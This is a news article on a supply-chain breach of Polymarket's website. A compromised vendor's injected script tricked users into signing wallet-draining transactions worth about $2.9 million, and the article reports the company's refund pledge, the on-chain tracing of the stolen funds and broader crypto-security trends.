Polymarket says frontend breach drained about $2.9m, pledges full refunds

Polymarket, one of the largest decentralized prediction-market platforms, said attackers drained roughly $2.9 million from a small number of users after compromising one of its third-party vendors and injecting malicious code into its website, an incident the company says it has contained and for which it has pledged full refunds.

The platform disclosed the breach on Thursday, explaining that a third-party vendor it relies on had been compromised, allowing attackers to insert a malicious script into the front end of its website for some users. When affected users connected their wallets, the script is said to have tricked them into approving or signing transactions that drained their funds. Polymarket said it had contained the incident, removed the affected dependency, and was contacting impacted users to reimburse them in full.

Crucially, the attack did not break the platform's underlying blockchain contracts. Security researchers characterized it as a supply-chain compromise rather than a smart-contract exploit, meaning the on-chain systems continued to operate as designed while the weak point sat in the code delivered to users' browsers. That distinction matters because front-end attacks can succeed even when a protocol's core contracts remain intact, by manipulating what users see and approve in their wallets.

On-chain investigators who first flagged the incident estimated that around $2.94 million was taken from at least 11 wallets, with some analyses putting the number of affected accounts at fewer than 15. The targeted asset was the platform's dollar-pegged collateral token, used across its markets and backed by a major stablecoin. After draining the funds, the attacker bridged them from one blockchain network to another and converted the proceeds into roughly 1,893 units of ether, consolidating the haul into a single address that investigators continued to track. Because the stolen funds remain visible on-chain, recovery is not ruled out.

It is not the platform's first security scare this year. In a separate episode weeks earlier, several hundred thousand dollars were drained from an internal operations wallet tied to rewards payouts, though user funds were not affected at the time. Earlier phishing attempts have also cost some users. The recurring theme across these events is that the protocol itself has held up, while the surrounding infrastructure, including vendor relationships and front-end components, has been the point of failure, a pattern the latest breach repeats.

The speed of the response drew attention, with the company acknowledging the compromise within about 15 minutes of the first public report. Polymarket did not name the compromised vendor and declined to comment further. Its commitment to reimburse affected users, alongside transparent communication, may help limit reputational damage, though analysts noted that two infrastructure-related incidents in under two months raises questions about how rigorously the platform vets external partners and detects tampering as it scales.

The episode lands amid a broader run of crypto-security breaches. Industry trackers have flagged the period as one of the most active quarters for incidents on record by count, with supply-chain and key-compromise attacks featuring heavily. For users, the takeaway echoed across analyses was familiar: exercise caution with wallet connections, verify website addresses, and scrutinize transaction prompts, since front-end attacks can make malicious requests appear indistinguishable from legitimate ones.